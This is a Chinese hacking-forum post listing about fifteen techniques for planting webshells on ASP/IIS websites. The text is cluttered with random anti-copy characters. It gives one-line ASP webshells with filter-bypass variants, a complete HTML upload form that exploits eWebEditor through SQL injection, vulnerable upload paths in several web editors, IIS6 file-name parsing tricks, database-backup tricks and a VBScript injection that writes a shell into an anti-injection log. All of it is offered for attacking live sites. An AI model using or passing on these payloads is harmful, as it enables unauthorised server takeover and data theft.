- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式" m, H- i1 v1 s! }$ M+ q* h. e
% n1 s: |$ M2 D( q. p/ o2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp5 C* u B: ]* r( }. V: u0 J2 a
4 g0 c' Z/ Q c* d, B7 s% I) c2 U3.上传漏洞:' k- {9 ?" f0 \9 [ W
C; |4 Z# T: S7 y: A% }1 b6 j动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
' L5 L% H% P2 f
% U1 h" H! M8 [+ M* H8 H! A逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件) g( F) F( C) Q9 o: B2 ]. f* D
$ E+ ?: Y+ h$ O8 Q
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp+ u0 C. f$ l h; R! m. G/ F$ H9 B
然后在上传文件里面填要传的图片格式的ASP木马
: S0 ^" j) s. W* h就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp, N# u: b! l; A* }# ~ V
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传1 s+ n/ H8 X( x4 q3 B% k
* X' m2 P0 \4 ~ A9 O
<html>8 f8 a1 E9 G& H8 m: t$ B2 ]/ K% J3 \9 Q
<head>
# U' K$ l8 ^) ?2 v<title>ewebeditor upload.asp上传利用</title>
( c1 ^3 ^" i* V# C2 u8 l# o) `</head>6 n# K5 X1 g5 {; w' H
<body>
2 `, q3 q% a. ]3 I4 b8 Z! S8 c<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">& Y; z, w$ r% W* @
<input type=file name=uploadfile size=100><br><br>6 k1 b7 V$ {% f+ F0 w( ^; P5 d% n
<input type=submit value=Fuck>- A4 X0 I( D R' j. J) n2 V
</form>6 E: @, T. E9 s
</body>
+ y3 e4 N. c( t) K</form>' _/ e, d9 L% r0 O: a2 ^
</html> b& r* G# g {3 @1 t7 O$ ? D
+ f2 k8 ]4 E# T: C n& R
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问. V5 V0 `- `; s( F' T4 Z+ V% x
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp: k1 `2 Y: f$ {6 Q8 R p! u G
6 }3 s( |' O3 b4 u4 r; E5 D利用windows2003解析。建立zjq.asp的文件夹
. ?" A( W% f- J2 P! l; ^$ c _$ `; f+ A
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型5 F+ ^. i5 ^8 ~
8 f2 p9 n, p: A$ E( f7.cuteeditor:类似ewebeditor! }$ B6 }& |+ |9 H- [
9 U- ?- Z% O1 f8.htmleditor:同上% `8 R8 M, V- i/ o2 |' U9 b
8 p! V* a: l4 [
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
: U! A( T# t" p4 m7 P& _8 |
5 c# z& s' I ^$ Z! B9 |; j. m<%execute request("value")%><%'<% loop <%:%>& b$ s! y9 p9 K+ n
8 \! I3 }" l( U. `; Y$ n
<%'<% loop <%:%><%execute request("value")%>
5 k; S, }& y) v+ I3 P
( V$ h4 i- U$ J5 f<%execute request("value")'<% loop <%:%>! C; v% t; J7 [# y' a. a
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
, ?5 A6 X0 n6 I; e6 e/ P- a7 T- _- X7 ~0 }5 z$ s$ F3 r r
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞! t0 ` K' ?( _, ~
. v! G4 U1 _" |) L7 ?% J11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3" \$ I& \/ }$ Z+ u
: ~; [& k; [% p! p6 e
解析漏洞得到webshell0 M4 v1 L9 ~/ S' O$ \! N
4 ?( R) P) c+ y8 z; K4 W r; N
12.mssql差异备份,日志备份,前提需知道web路径
$ g- }0 {2 j( ~2 b. \1 ]" ]+ R: e& A2 h+ Y1 \$ _0 B V
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell/ r8 ?; s4 G s/ ~
/ @( W4 O- _, z; q
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
" m3 N$ d; B# G7 w0 R: \. T0 h4 p m6 D3 i
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
3 J7 X; Y4 ~! w" r$ Y/ m
5 [/ D5 l9 o* G! B/ ^3 {以上只是本人的一些拙见,并不完善,以后想到了再继续添加% u- u3 x$ r" J4 M
不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|